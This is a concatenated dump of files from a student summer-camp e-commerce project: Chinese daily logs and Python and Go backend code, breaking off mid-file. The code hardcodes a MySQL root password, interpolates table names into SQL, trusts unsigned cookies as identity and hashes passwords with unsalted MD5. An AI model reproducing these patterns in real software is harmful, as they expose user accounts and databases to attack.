"313928f9999191ba546ec2db4105c4d08893bdf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 129, "license_type": "no_license", "max_line_length": 35, "num_lines": 7, "path": "/Old-Li883/日报/7.19.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.19\n\n今天调试完了商城后台,感觉功能还不是很齐全......还差点零碎的功能\n\n明日计划\n\n学习前端" }, { "alpha_fraction": 0.5631517767906189, "alphanum_fraction": 0.5805330276489258, 
"avg_line_length": 25.984375, "blob_id": "393f0c5cf425caad9d7adfec4bdd24460bdc7780", "content_id": "98154fc7577af9445dabc4a51f137168eebc0ce9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1840, "license_type": "no_license", "max_line_length": 88, "num_lines": 64, "path": "/Old-Li883/mall/model/administration.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "\"\"\"\n管理员\n属性 id,password,email,identity\n注册,认证提交申请的\n查找所有或指定商家,客户,商品信息\n封号,(强制下架商品)\n\"\"\"\n\nfrom util.response import response\nimport pymysql\n\ndb = pymysql.connect(\n host=\"127.0.0.1\", user=\"root\", db=\"mall\", passwd=',lch980929')\ncursor = db.cursor()\n\n\ndef a_register(id, password, email):\n cursor.execute(\"select * from administrator where id=%s\", id)\n if cursor.fetchone() == (None):\n cursor.execute(\n \"insert into administrator(id,password,email,identify) values(%s,%s,%s,%s)\",\n (\n id,\n password,\n email,\n 0,\n ))\n db.commit()\n return response(200)\n else:\n return response(400, \"id has been used\")\n\n\ndef identify(id, identity):\n cursor.execute(\"select identify from %s\" % identity + \" where id=%s\",\n (id, )) # 动态创建数据表必须这样创建\n identify = cursor.fetchone()\n if identify == (None):\n return response(400, \"id has not exist\")\n cursor.execute(\"update %s \" % identity + \" set identify=1 where id=%s\",\n (id, ))\n db.commit()\n return response(200)\n\n\ndef no_identity():\n data = []\n cursor.execute(\"select * from client where identify=0\")\n for i in cursor.fetchall():\n data.append(i)\n cursor.execute(\"select * from merchant where identify=0\")\n for i in cursor.fetchall():\n data.append(i)\n cursor.execute(\"select * from administrator where identify=0\")\n for i in cursor.fetchall():\n data.append(i)\n return response(200, data)\n\n\ndef prohibited(id, identity): # 封号\n cursor.execute(\"update %s\" % identity + \" set identify=0 where id=%s\",\n (id, ))\n db.commit()\n 
return response(200)" }, { "alpha_fraction": 0.7704917788505554, "alphanum_fraction": 0.8196721076965332, "avg_line_length": 7.857142925262451, "blob_id": "bfeee1a06e7f665c26c2e1554f15b6d8a0d4c6c5", "content_id": "1d8c6153da546725bef301b311954bbe38e603bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 131, "license_type": "no_license", "max_line_length": 19, "num_lines": 7, "path": "/Old-Li883/日报/7.12.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.12\n\npyMySQL学习,并写了一个相关练习\n\n了解相关前后端分离的知识,看了一篇博客\n\n了解restful架构" }, { "alpha_fraction": 0.6600000262260437, "alphanum_fraction": 0.7200000286102295, "avg_line_length": 3.6363637447357178, "blob_id": "5b502bbdf94bb967bf78cb74f4c895d28d78da10", "content_id": "83fb40bff3516bd5257f88d489e92142a4ba9926", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 94, "license_type": "no_license", "max_line_length": 14, "num_lines": 11, "path": "/Old-Li883/日报/7.13.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.13\n\npython login学习\n\n看例子\n\n目前还没有写代码\n\n明日计划\n\n开始写代码" }, { "alpha_fraction": 0.4251968562602997, "alphanum_fraction": 0.4803149700164795, "avg_line_length": 5.400000095367432, "blob_id": "aa69c173f1ea989e714a545a29a0b6b3df71197e", "content_id": "afb8a1bcf4e0a58a28ba6b87c0d0c004155c3a9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 205, "license_type": "no_license", "max_line_length": 17, "num_lines": 20, "path": "/Shixiaoyanger/日报/7.10.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.10日报\n**上午**\n---\n1.Go beego 框架安装入门\n\n2.HTML入门\n\n---\n\n## **下午**\n\n1.大致浏览http\n\n2.beego学习,懵逼中\n\n\n---\n## **晚上**\n\n划水,摸鱼。。。混了一晚上" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6969696879386902, "avg_line_length": 
5.800000190734863, "blob_id": "0547951706af0ab0ee2ff629437f148aceec6e46", "content_id": "7364239d7166ed7715eabd0bdde1c65894f7f2aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "no_license", "max_line_length": 17, "num_lines": 5, "path": "/jackwener/日报/7.9.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.9日报\n\n## 一天\n\n把练手任务的登录注册部分写了个大概" }, { "alpha_fraction": 0.7136752009391785, "alphanum_fraction": 0.7264957427978516, "avg_line_length": 12.764705657958984, "blob_id": "26dfeaffaf4f63dce0769ff6270199abb80ba533", "content_id": "edfd87af1f70e5c25f54fe2adc225af6cd6443bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 544, "license_type": "no_license", "max_line_length": 48, "num_lines": 17, "path": "/yixiaoer/日报/7.13.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.13日报\n\n## 今日计划\n实现注册与登陆\n\n## 完成情况(继续,没有完成...)\n\n* 接口(后台进行操作,就像是接口内的操作,提供给前端一个接入点,前端从这个点接入,就像是接口)\n* 路由(“/login”这样的东西,类似接入的一个点)\n* 在登陆成功(id&pw与数据库内容匹配)后set cookie\n* 运用框架叭\n* 先实现后台功能(后台传输数据给前端,对于这个数据进行操作,再将信息传输给前端)\n\n\n\n明日继续\nto be continued\n" }, { "alpha_fraction": 0.8423645496368408, "alphanum_fraction": 0.871921181678772, "avg_line_length": 39.400001525878906, "blob_id": "21144e72637b74140266b1aeb3d3f07e3639f4fa", "content_id": "8371d2c9be0906dad29deb8a501132d512cb8a85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 513, "license_type": "no_license", "max_line_length": 97, "num_lines": 5, "path": "/Old-Li883/mall/note/7.17bug记录.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.17bug记录\n\n1. 动态创建数据表:(pycharm)变量不能是字符串,因为他本身就是一个字符串,应强制转换,我把他转化成整型\n2. 数据库一定要记得commit要不然数据不会真正提交到数据库中\n3. 
在图片的存储过程中,本来上网查想将图片read下来然后直接存在数据库中,不过这样感觉过于恐怖,后来在学长的帮助下用nginx配置了一个静态文件,以后只需把路径存在数据库中,告诉前端就OK了\n\n" }, { "alpha_fraction": 0.6475780606269836, "alphanum_fraction": 0.659633994102478, "avg_line_length": 21.123809814453125, "blob_id": "ff3d17429fab1618cfb28df2a1380522f97de058", "content_id": "7f98e81238d580785a5218fc334d661bf0ffe4bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 4805, "license_type": "no_license", "max_line_length": 107, "num_lines": 210, "path": "/jackwener/server/mall/controllers/goods.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"mall/models\"\n\t\"encoding/json\"\n\t\"github.com/astaxie/beego/orm\"\n\t\"log\"\n\t\"fmt\"\n\t\"os\"\n)\n\n// 种类查询\nfunc (c *MainController) KindSearch() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tfmt.Print(ob)\n\tkind := ob.Good[0].Kind\n\to := orm.NewOrm()\n\tvar goods []models.Good\n\tnum, err := o.QueryTable(\"good\").Filter(\"kind\", kind).All(&goods)\n\tvar reJson models.GoodJson\n\tif err != nil{\n\t\treJson.Status = 404\n\t\treJson.Message = \"查询失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if num == 0 {\n\t\treJson.Status = 204\n\t\treJson.Message = \"分类为空\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\tvar record models.Record\n\terr1 := o.QueryTable(\"record\").Filter(\"content\",kind).One(&record)\n\tif err1 == nil {\n\t\to.QueryTable(\"record\").Filter(\"content\", kind).Update(orm.Params{\"number\": orm.ColValue(orm.ColAdd, 1)})\n\t} else {\n\t\trecord.Content = kind\n\t\trecord.Number = 1\n\t\to.Insert(&record)\n\t}\n\treJson.Good = goods\n\treJson.Status = 200\n\treJson.Message = \"查询成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n}\n\n// 地域查询\nfunc (c *MainController) LocalSearch() {\n\tvar ob models.GoodJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tlocal := 
ob.Good[0].Local\n\to := orm.NewOrm()\n\tvar goods []models.Good\n\tnum, err := o.QueryTable(\"good\").Filter(\"local\", local).All(&goods)\n\tvar reJson models.GoodJson\n\tif err != nil{\n\t\treJson.Status = 404\n\t\treJson.Message = \"查询失败\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t} else if num == 0 {\n\t\treJson.Status = 204\n\t\treJson.Message = \"分类为空\"\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\tvar record models.Record\n\terr1 := o.QueryTable(\"record\").Filter(\"content\",local).One(&record)\n\tif err1 == nil {\n\t\to.QueryTable(\"record\").Filter(\"content\", local).Update(orm.Params{\"number\": orm.ColValue(orm.ColAdd, 1)})\n\t} else {\n\t\trecord.Content = local\n\t\trecord.Number = 1\n\t\to.Insert(&record)\n\t}\n\treJson.Good = goods\n\treJson.Status = 200\n\treJson.Message = \"查询成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n}\n\n// 商品信息页\nfunc (c *MainController) Goods() {\n\ttitle := c.GetString(\":good\")\n\tfmt.Print(title)\n\tvar good models.Good\n\to := orm.NewOrm()\n\terr := o.QueryTable(\"good\").Filter(\"title\", title).One(&good)\n\tfmt.Print(good)\n\tif err != nil {\n\t\tvar reJson models.GoodJson\n\t\treJson.Message = \"商品不存在\"\n\t\treJson.Status = 404\n\t\tc.Data[\"json\"] = reJson\n\t\tc.ServeJSON()\n\t\treturn\n\t}\n\tlocal := good.Local\n\t//fmt.Printf(local)\n\tintro := good.Intro\n\tprice := good.Price\n\turl := \"static/img/\" + title +\"/\"\n\tvar reJson = models.GoodJson{}\n\tvar good1 models.Good\n\tgood1.Local = local\n\tgood1.Price = price\n\tgood1.Intro = intro\n\treJson.Good = append(reJson.Good,good1)\n\treJson.Url = url\n\treJson.Status = 200\n\treJson.Message = \"返回成功\"\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}\n\n// 上传图片\nfunc (c *MainController) Picture() {\n\tname := c.GetString(\":good\")\n\tf, h, err := c.GetFile(\"name\")\n\tif err != nil {\n\t\tlog.Fatal(\"getfile err \", err)\n\t}\n\tdefer f.Close()\n\tpath := \"static/img/\"+name\n\t_, err1 := 
os.Stat(path)\n\tif err1 != nil {\n\t\terr2 := os.Mkdir(path, os.ModePerm)\n\t\tif err2 != nil{\n\t\t\tfmt.Print(err2)\n\t\t}\n\t}\n\tc.SaveToFile(\"name\", \"static/img/\"+name+\"/\"+ h.Filename) // 保存位置在 static/static/img/name/, 没有文件夹要先创建\n}\n\n\n\n// 最新查询\nfunc (c *MainController) RecentSearch() {\n\tvar reJson models.SearchJson\n\tvar records []models.Record\n\to := orm.NewOrm()\n\t_, err := o.QueryTable(\"record\").OrderBy(\"-date\").All(&records)\n\tif err != nil{\n\t\to.QueryTable(\"record\").All(&records)\n\t}\n\tfmt.Print(records)\n\tfor i, _ := range records{\n\t\treJson.Content = append(reJson.Content,records[i].Content)\n\t}\n\treJson.Message = \"查询成功\"\n\treJson.Status = 200\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}\n\n// 热门查询\nfunc (c *MainController) PopularSearch() {\n\tvar reJson models.SearchJson\n\tvar records []models.Record\n\to := orm.NewOrm()\n\t_, err := o.QueryTable(\"record\").OrderBy(\"-number\").All(&records)\n\tif err != nil{\n\t\to.QueryTable(\"record\").All(&records)\n\t}\n\tfmt.Print(records)\n\tfor i, _ := range records{\n\t\treJson.Content = append(reJson.Content,records[i].Content)\n\t}\n\treJson.Message = \"查询成功\"\n\treJson.Status = 200\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n\treturn\n}\n\n\n/*\nfunc (c *MainController) Car() {\n\tvar ob models.ReJson\n\tjson.Unmarshal(c.Ctx.Input.RequestBody, &ob)\n\tuserId := ob.Users[0].Id\n\to := orm.NewOrm()\n\tvar goods[] class.Goods\n\tvar carId int\n\to.QueryTable(\"user\").Filter(\"id\", userId).RelatedSel().One(&carId,\"carId\")\n\to.QueryTable(\"good\").Filter(\"car_id\",carId).All(&goods)\n\tvar reJson models.ReJson\n\treJson.Goods = goods\n\treJson.Status = 200\n\tc.Data[\"json\"] = reJson\n\tc.ServeJSON()\n}\n\nfunc (c *MainController) PopularSearch() {\n\n}\n\nfunc (c *MainController) PopularSearch() {\n\n}\n*/" }, { "alpha_fraction": 0.8101266026496887, "alphanum_fraction": 0.8101266026496887, "avg_line_length": 21.714284896850586, "blob_id": 
"136ca5fa3f120f84bc6dd05e821d34317b0424f5", "content_id": "823f0b8669d92349986198df5538943815c37cb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "no_license", "max_line_length": 33, "num_lines": 7, "path": "/Old-Li883/mall/views/__init__.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import Flask\n\napp = Flask(__name__)\nimport views.client_views\nimport views.guys_views\nimport views.merchant_views\nimport views.administration_views" }, { "alpha_fraction": 0.5853658318519592, "alphanum_fraction": 0.7317073345184326, "avg_line_length": 7.199999809265137, "blob_id": "aee6fa620c1e68075faf63031d5065c15f55cd88", "content_id": "35ffa5c201b5e70465b580dc9d5079fda5b78f7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 75, "license_type": "no_license", "max_line_length": 17, "num_lines": 5, "path": "/jackwener/日报/7.10.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.10日报\n\n感受同 7.11.md\n\n另外下午把CSAPP链接一章看完了\n" }, { "alpha_fraction": 0.5263158082962036, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 5.333333492279053, "blob_id": "e38d1362692e2907b1d83545f89514e05bb3e554", "content_id": "93dfc5bb449e5a3e1ddc38fa3cfc961fc1100596", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 39, "license_type": "no_license", "max_line_length": 8, "num_lines": 3, "path": "/jackwener/日报/7.15.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.15日报\n\n把练手项目做完了\n" }, { "alpha_fraction": 0.7335907220840454, "alphanum_fraction": 0.7335907220840454, "avg_line_length": 25, "blob_id": "07b1d12491ac4615f5c28cf0c7a3167783f4b91d", "content_id": "91b774e9872cc45e3c18691a0e8effa5b459d9a1", "detected_licenses": [], "is_generated": false, "is_vendor": false, 
"language": "Go", "length_bytes": 259, "license_type": "no_license", "max_line_length": 84, "num_lines": 10, "path": "/jackwener/server/mall/routers/admin.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package routers\n\nimport (\n\t\"mall/controllers\"\n\t\"github.com/astaxie/beego\"\n)\nfunc init() {\n\tbeego.Router(\"/api/admin/kind\", &controllers.MainController{}, \"post:KindSearch\")\n\tbeego.Router(\"/api/admin/local\", &controllers.MainController{}, \"post:LocalSearch\")\n}" }, { "alpha_fraction": 0.6904761791229248, "alphanum_fraction": 0.761904776096344, "avg_line_length": 7.599999904632568, "blob_id": "746eedf0ebf9ce2c5be2e3d9ea6f5a28a847fec0", "content_id": "664ba71d3b3a9166c1517b0871875cb918141087", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 88, "license_type": "no_license", "max_line_length": 19, "num_lines": 5, "path": "/Old-Li883/日报/7.20.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.20\n\n今天看html,css教程\n\n明日计划:看js教程,并尝试写一下前段" }, { "alpha_fraction": 0.6062656044960022, "alphanum_fraction": 0.623709499835968, "avg_line_length": 16.16666603088379, "blob_id": "2bb3f7f4ee25704ee03df62ab9d0be8c59a22e7f", "content_id": "3086eba59300178cb3bec506fce4a900393cbe1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 3057, "license_type": "no_license", "max_line_length": 75, "num_lines": 162, "path": "/Shixiaoyanger/market/controllers/goods.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controllers\n\nimport (\n\t\"fmt\"\n\n\t\"encoding/json\"\n\t\"market/models\"\n\t\"github.com/astaxie/beego\"\n)\n\ntype GoodsController struct{\n\tMainController\n}\ntype SearchBy struct{\n\tTypes string `json:\"types\"` \n\tDetails string `json:\"details\"`\n\t//按类别 // 1 电子设备\n\t//001\t// 2 书籍资料\n\t\t\t// 3 宿舍百货\n\t\t\t// 4 
美妆护肤\n\t\t\t// 5 女装\n\t\t\t// 6 男装\n\t\t\t// 7 鞋帽配饰\n\t\t\t// 8 门票卡券\n\t\t\t// 9 其他\n\n\t//按地域 // 1 韵苑\n\t//002\t// 2 沁苑\n\t\t\t// 3 紫菘\n\t\t\t// 4 其他\n}\n\n//查询并返回商品信息\nfunc (this *GoodsController) Search(){\n\tvar op SearchBy\n\terr := json.Unmarshal(this.Ctx.Input.RequestBody,&op)\n\tif err != nil{\n\t\tbeego.Error(err)\n\t}\n\tvar goodsinfo []*models.Goods\n\tfmt.Println(\"dasa\",op.Types,\"jutyht\")\n\tvar ok bool\n\n\tif op.Types ==\"001\"{\n\n\t\tok, goodsinfo = models.SearchByCategory(op.Details)\n\n\t}\n\tif op.Types == \"002\"{\n\n\t\tok, goodsinfo = models.SearchByPosition(op.Details)\n\n\t}\n\tif ok{\n\t\tgoodsstruct :=GoodsStruct{\n\t\t\tGoodsinfo: goodsinfo,\n\t\t}\n\t\tthis.Data[\"json\"] = goodsstruct \n\t\tthis.ServeJSON()\n\n\t}\n}\n//查询单个商品信息//1\nfunc (this *GoodsController) View(){\n\n\tid := this.Ctx.Input.Param(\":id\")\n\tok,goods := models.SearchById(id)\n\tif ok{\n\t\tgoodsstrct := GoodsStruct{\n\t\t\tGoodsinfo: []*models.Goods{&goods},\n\t\t\tStatusCode: sucgoodsinfo,\n\t\t}\n\t\tthis.Data[\"json\"] = goodsstrct\n\t\tthis.ServeJSON()\n\t}\n\t\n\tthis.RetError(errNoGoods)\n\treturn\n}\n//添加商品信息\nfunc (this *GoodsController) Add(){\n\tvar goinfo models.Goods\n\terr0 := json.Unmarshal(this.Ctx.Input.RequestBody,&goinfo)\n\tif err0 != nil{\n\t\tbeego.Error(err0)\n\t}\n\tok, err := models.Addgoods(&goinfo)\n\tif ok{\n\t\tthis.Data[\"json\"] = \"添加成功\"\n\t}else{\n\t\tif err == nil{\n\t\t\tthis.Data[\"json\"] = \"商品名已存在\"\n\t\t}else{\n\t\t\tthis.Data[\"json\"] = \"添加失败\"\n\t\t}\n\t}\n this.ServeJSON()\n}\n\n\nfunc (this *GoodsController) Popular(){\n\n\terr,goods := models.PopularSearch()\n\tif err != nil{\n\t\tbeego.Error(err)\n\t\tthis.RetError(errDatabase2)\n\t\treturn\n\t}\n\tgoodsstrct := GoodsStruct{\n\t\tGoodsinfo: goods , //[]*models.Goods{&goods},\n\t\tStatusCode: sucgoodsinfo,\n\t}\n\tthis.Data[\"json\"] = goodsstrct\n\tthis.ServeJSON()\n\treturn\n\t\n}\nfunc (this *GoodsController) Latest(){\n\n\terr,goods := 
models.LatestSearch()\n\tif err != nil{\n\t\tbeego.Error(err)\n\t\tthis.RetError(errDatabase2)\n\t\treturn\n\t}\n\tgoodsstrct := GoodsStruct{\n\t\tGoodsinfo: goods , \n\t\tStatusCode: sucgoodsinfo,\n\t}\n\tthis.Data[\"json\"] = goodsstrct\n\tthis.ServeJSON()\n\treturn\n\t\n}\n\n\n\nfunc (this *GoodsController) Test(){\n\tthis.TplName = \"test.html\"\n}\n\n\n\n/*time 操作\n\n\t // 获取当前(当地)时间\n\t t := time.Now()\n\t // 获取0时区时间\n\t t = time.Now().UTC()\n\t fmt.Println(t)\n\t // 获取当前时间戳\n\t timestamp := t.Unix()\n\t fmt.Println(timestamp)\n\t // 获取时区信息\n\t name, offset := t.Zone()\n\t fmt.Println(name, offset)\n\t // 把时间戳转换为时间\n\t currenttime := time.Unix(timestamp+int64(offset), 0)\n\t // 格式化时间\n\t fmt.Println(\"Current time : \", currenttime.Format(\"2006-01-02 15:04:05\"))\n\t\t\n*/\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t" }, { "alpha_fraction": 0.6060991287231445, "alphanum_fraction": 0.6060991287231445, "avg_line_length": 27.722627639770508, "blob_id": "56d0a45d1f33441dce1e9a4a144e2b817e04a027", "content_id": "ccbec38aede50b53c699c4acc545b20c824e8800", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4111, "license_type": "no_license", "max_line_length": 89, "num_lines": 137, "path": "/Old-Li883/mall/views/client_views.py", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "from flask import request\nfrom werkzeug.security import generate_password_hash\nfrom views import app\nfrom model.client import register, find_commodity_addr, find_commodity_cls\nfrom model.client import find_info, modify_info\nfrom model.client import in_shopping_cart, out_shopping_cart, check_shopping_cart\nfrom model.client import in_favourites, out_favourites, check_favourites, check_commodity\nfrom model.client import buy_thing\nfrom model.client import add_addr, modify_addr, check_addr\nfrom model.client import find_message\n\n\[email protected]('/api/client/registration', 
methods=['post'])\ndef registration():\n \"\"\"\n 注册时除基本信息外还要写清楚收货地址\n \"\"\"\n\n data = request.get_json()\n id = data['id']\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n name = data['name']\n addr = data['addr']\n phone = data['phone']\n return register(id, password, email, name, addr, phone)\n\n\[email protected]('/api/client/commodity/location', methods=['post'])\ndef commodity_location():\n \"\"\"\n 按分类查询商品,用query表名查询方式及类型\n \"\"\"\n\n way = request.args.get('way')\n data = request.get_json()\n name = data['name']\n if way == 'cls':\n return find_commodity_cls(name)\n elif way == 'addr':\n return find_commodity_addr(name)\n\n\[email protected]('/api/client/info', methods=['post', 'get'])\ndef info():\n operate = request.args.get('operate')\n if operate == 'find':\n id = request.cookies.get('id')\n data = request.get_json()\n who = data['who'] # 查自己的还是商家的信息\n return find_info(who, id)\n elif operate == 'modify':\n data = request.get_json()\n id = request.cookies.get(\"id\")\n pwd = data['password']\n password = generate_password_hash(pwd)\n email = data['email']\n return modify_info(id, password, email)\n\n\[email protected]('/api/client/cart', methods=['post', 'get'])\ndef cart():\n operate = request.args.get('operate')\n c_id = request.cookies.get(\"id\")\n if operate == 'in':\n data = request.get_json()\n id = data['id'] # 这里是物品id\n return in_shopping_cart(c_id, id)\n elif operate == 'out':\n data = request.get_json()\n id = data['id'] # 这里是物品id\n return out_shopping_cart(c_id, id)\n elif operate == 'check':\n return check_shopping_cart(c_id)\n\n\[email protected]('/api/client/favourites', methods=['post', 'get'])\ndef favourites():\n \"\"\"\n 所有用户的收藏夹用一个数据库\n 方便后面的查找\n \"\"\"\n\n operate = request.args.get('operate')\n c_id = request.cookies.get(\"id\")\n if operate == 'in':\n data = request.get_json()\n m_id = data['id'] # 这里是物品id\n return in_favourites(c_id, m_id)\n elif operate == 'out':\n data = 
request.get_json()\n m_id = data['id'] # 这里是物品id\n return out_favourites(c_id, m_id)\n elif operate == 'check':\n return check_favourites(c_id)\n\n\[email protected]('/api/client/commodity')\ndef check_commodity_info():\n c_id = request.cookies.get(\"id\")\n id = request.args.get(\"id\")\n return check_commodity(c_id, id)\n\n\[email protected]('/api/client/buy', methods=['post'])\ndef buy():\n c_id = request.cookies.get(\"id\")\n data = request.get_json()\n id = data['id']\n return buy_thing(c_id, id)\n\n\[email protected]('/api/client/addr', methods=['post', 'get'])\ndef addr():\n c_id = request.cookies.get(\"id\")\n operate = request.args.get('operate')\n if operate == 'add':\n data = request.get_json()\n name = data['name']\n ad = data['ad']\n phone = data['phone']\n return add_addr(c_id, name, ad, phone)\n elif operate == 'modify':\n data = request.get_json()\n name = data['name']\n ad = data['ad']\n phone = data['phone']\n return modify_addr(c_id, name, ad, phone)\n elif operate == 'check':\n check_addr(c_id)\n\n\[email protected]('/api/client/message')\ndef message():\n id = request.cookies.get(\"id\")\n return find_message(id)\n" }, { "alpha_fraction": 0.6615384817123413, "alphanum_fraction": 0.7076923251152039, "avg_line_length": 5, "blob_id": "9d569b77f8e2e15bd77373386ee0a64e34ccdc45", "content_id": "76253085bd3c852cd83e66105986dabe189ddfa3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 133, "license_type": "no_license", "max_line_length": 19, "num_lines": 11, "path": "/Old-Li883/日报/7.15.md", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "# 7.15\n\n写热身任务\n\n遇到挺多问题\n\n如:\n\nMySQL中用了%d失败,应该全用%s\n\ncookie设置,获取,删除问题等" }, { "alpha_fraction": 0.7110186815261841, "alphanum_fraction": 0.7214137315750122, "avg_line_length": 23.049999237060547, "blob_id": "56b750dd3a73a463a4516643c9a682e7b76ab533", "content_id": "6ad9e954bc37df59097aee9d0f2c1363fe79d7dd", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 481, "license_type": "no_license", "max_line_length": 54, "num_lines": 20, "path": "/yixiaoer/server/src/project2/main.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"github.com/labstack/echo\"\n\t\"project/project2/controller\"\n)\n\nfunc main() {\n\te := echo.New()\n\n\te.POST(\"/login\", controller.Login)\n\te.POST(\"/sign-up\", controller.SignUp)\n\te.POST(\"/page/categories\", controller.ShowCategory)\n\te.POST(\"/page/location\", controller.ShowLocation)\n\te.POST(\"/page/commodities\", controller.CommodityInfo)\n\te.POST(\"/page/popularity\", controller.PopluarRank)\n\te.POST(\"/homepage\",controller.UserInfo)\n\n\te.Logger.Fatal(e.Start(\":8080\"))\n}\n" }, { "alpha_fraction": 0.6179604530334473, "alphanum_fraction": 0.6245560646057129, "avg_line_length": 20.670330047607422, "blob_id": "e42a0c1331037af6ede76813ac28e2e4537afa2b", "content_id": "385340db1c7b37b03e6f95ef1b304a607760f4f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 2119, "license_type": "no_license", "max_line_length": 54, "num_lines": 91, "path": "/yixiaoer/server/src/project2/controller/user.go", "repo_name": "tofar/bingyan-summer-camp2018", "src_encoding": "UTF-8", "text": "package controller\n\nimport (\n\t\"net/http\"\n\t\"github.com/labstack/echo\"\n\t\"project/project2/model\"\n\t\"time\"\n\t\"crypto/md5\"\n\t\"encoding/hex\"\n)\n\nfunc Login(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t\"name\": \"\",\n\t\t\"password\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\n\th := md5.New()\n\th.Write([]byte(userInfo[\"password\"])) // 需要加密的字符串为密码\n\thas := hex.EncodeToString(h.Sum(nil)) // 输出加密结果\n\tuserInfo[\"password\"] = has\n\n\tvar u map[string]string\n\tif model.Login(userInfo) == 0 { //密码与账户匹配\n\t\tcookie := new(http.Cookie)\n\t\tcookie.Name 
= \"username\"\n\t\tcookie.Value = userInfo[\"name\"]\n\t\tcookie.Expires = time.Now().Add(24 * time.Hour)\n\t\tc.SetCookie(cookie)\n\n\t\tu = map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\t} else if model.Login(userInfo) == 1 { //有name但是pw不匹配\n\t\tu = map[string]string{\n\t\t\t\"status\": \"wrong pw\",\n\t\t}\n\t} else if model.Login(userInfo) == 2 { //没有name\n\t\tu = map[string]string{\n\t\t\t\"status\": \"no user\",\n\t\t}\n\t}\n\treturn c.JSON(http.StatusOK, u)\n}\n\nfunc SignUp(c echo.Context) error {\n\t//Request(c)\n\tuserInfo := map[string]string{\n\t\t//\"id\": \"\",在数据库中会自动分配一个id所以在注册时可以不需要设置id\n\t\t\"password\": \"\",\n\t\t\"email\": \"\",\n\t\t\"phone\": \"\",\n\t\t\"name\": \"\",\n\t}\n\tc.Bind(&userInfo)\n\t//data := []byte(userInfo[\"password\"])\n\t//has := md5.Sum(data)\n\th := md5.New()\n\th.Write([]byte(userInfo[\"password\"])) // 需要加密的字符串为密码\n\thas := hex.EncodeToString(h.Sum(nil)) // 输出加密结果\n\tuserInfo[\"password\"] = has\n\tvar u map[string]string\n\tif model.SignUp(userInfo) == 0 {\n\t\tu = map[string]string{\n\t\t\t\"status\": \"yes\",\n\t\t}\n\t} else if model.SignUp(userInfo) == 1 {\n\t\tu = map[string]string{\n\t\t\t\"status\": 